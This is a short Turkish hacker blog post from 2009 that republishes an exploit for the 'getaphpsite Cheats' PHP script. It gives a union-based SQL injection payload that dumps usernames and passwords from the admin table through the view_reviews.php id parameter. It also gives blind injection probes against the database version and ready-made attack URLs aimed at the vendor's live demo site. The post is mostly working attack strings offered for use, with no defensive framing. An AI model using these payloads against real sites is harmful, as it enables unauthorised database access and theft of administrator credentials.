"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

1 Ocak 2009 Perşembe

getaphpsite Cheats (id) R-Sql & B-Sql inj



getaphpsite Cheats (id) R-Sql & B-Sql inj

link: http://packetstormsecurity.org/0812-exploits/cheats-sql.txt

link: http://www.exploiter5.com/all.php?id=62

Exp 1: ( Remote )

http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[SQL] ( Reklam Kokusu AlIyorum : ) z0rlu.blogspot.com )

[SQL]=

0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--

exp 2: ( Blind )

http://z0rlu.blogspot.com/script/category.php?view_reviews.php?id=[BLiND]

[id]+and+substring(@@version,1,1)=5 ( true )

[id]+and+substring(@@version,1,1)=4 ( false )


for demo: ( Remote )

http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=0x3a+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9+from+admin--


for demo: ( Blind )

http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=5 ( true )

http://www.getaphpsite.com/demos/cheats/view_reviews.php?id=13+and+substring(@@version,1,1)=4 ( false )

0 yorum:

 
Dizi